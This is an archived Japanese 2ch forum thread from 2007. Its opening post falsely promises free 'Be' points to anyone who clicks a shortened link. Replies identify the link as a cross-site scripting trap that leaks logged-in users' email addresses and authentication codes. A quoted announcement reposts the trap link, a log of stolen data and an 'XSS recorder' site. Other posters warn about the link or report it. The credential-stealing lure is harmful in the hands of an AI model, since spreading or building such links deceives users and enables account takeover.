2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Be鯖のバグでポイント取り放題

1 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:16:50 ID:hpKLPfjV ?2BP(5820)
1、URLをクリックする http://z.la/ms0k2
2、BeGET!!ボタンを押す
3、押した分だけポイントゲット

2 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:17:51 ID:ixSbBv6k ?BRZ(10111)
>>1は罠

3 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:18:05 ID:7JKsX/bU ?PLT(20274)
>>1
クッキーオンでログインしている状態で踏むとメルアド+認証コード漏れます
クッキーが残ってても漏れるようです

4 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:18:07 ID:+RSXDLDC ?2BP(2880)
http://etc6.2ch.net/test/read.cgi/be/1196174603/参照スレ

5 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:18:13 ID:eKwdR7KS ?2BP(287)
>>1
マジでポイント増えたけどいいのかこれ・・・

6 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:18:23 ID:VGxuqxmO ?PLT(13407)
メアド抜かれた


7 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:19:07 ID:XwcxEsKE ?2BP(11)
>>1
ポイントが増えまくりwww

8 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:20:43 ID:OnupuBsz ?PLT(22989)
ν速で元々beつかえねーしw

9 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:23:01 ID:FyH8vvp2 ?PLT(33334)
>>1
死ね

10 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:23:38 ID:oF/pgIDH ?2BP(585)
>>1
危険

11 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:33:41 ID:fG6mZWbI ?PLT(12172)
ああ

12 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:38:44 ID:wQgwZpag ?2BP(6377)
【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見
http://news23.2ch.net/test/read.cgi/news/1196173345/

1 名前:スレ立て代行@大学中退(兵庫県) [] 投稿日:2007/11/27(火) 23:22:25 ID:EbtVATOs0● ?2BP(2350)
俺こと脱帽は、先日のいつか忘れたけど2chにXSSの脆弱性を発見した。
今回は通常のウェブブラウザ(除く専ブラ)からBeにログインした状態で
任意のURLにアクセスするとBeのメアドと認証コードが漏れる脆弱性であり、
それによってアカウント乗っ取りやプロフィールの変更が可能になってしまう。

現時点で数箇所のCGIで同脆弱性を確認しているが、この限りではない可能性もある。
サンプルURLを貼って置くが絶対に悪用しないよう注意を促したい。

http://z.la/ms0k2 (短縮URL、罠なので踏む時は注意)
http://moyashi.sosite.jp/xss/log.txt (盗まれた情報が記録されるファイル)

▼ 汎用XSS記録装置
http://moyashi.sosite.jp/xss/
▼ 俺公式サイト
http://manabi.homeunix.net/

13 :名無しさん@お腹いっぱい。:2007/11/28(水) 01:07:09 ID:d/C0bqPJ ?2BP(122)
おわったー

14 :名無しさん@お腹いっぱい。:2007/11/28(水) 01:37:39 ID:CC1IW9CG ?2BP(7920)
てすと

15 :名無しさん@お腹いっぱい。:2007/11/28(水) 01:52:02 ID:elYAh8f2 ?PLT(12580)
tesu

16 :名無しさん@お腹いっぱい。:2007/11/28(水) 01:58:45 ID:N4W7QCT2 ?PLT(33666)
わぁい!

17 :名無しさん@お腹いっぱい。:2007/11/28(水) 02:12:00 ID:elYAh8f2 ?PLT(12580)
tesu

18 :名無しさん@お腹いっぱい。:2007/11/28(水) 02:12:29 ID:4cJM7E/7 ?2BP(2880)
いただきます

19 :名無しさん@お腹いっぱい。:2007/11/28(水) 02:15:23 ID:kT7Iq0Ei ?2BP(0)
てすと

20 :名無しさん@お腹いっぱい。:2007/11/28(水) 02:18:44 ID:kT7Iq0Ei ?2BP(0)
tst

21 :オッサン ◆1.Fuck.nn. :2007/11/28(水) 02:34:53 ID:mKUazTph
★複数板BEのメアドと認証コードが漏れるURLを張る人報告スレ
http://qb5.2ch.net/test/read.cgi/sec2chd/1196184490/

22 :名無しさん@お腹いっぱい。:2007/11/28(水) 03:20:19 ID:jpBf6HZp ?2BP(6151)
>>1
マジだサンクス

23 :名無しさん@お腹いっぱい。:2007/11/28(水) 04:35:11 ID:bX1xYag+ ?2BP(850)
わぁい

24 :(=ω=.) ◆F100me7Cds :2007/11/29(木) 17:26:12 ID:8xkmWtV/ ?PLT(45679)
>>1
通報しますた!

5 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)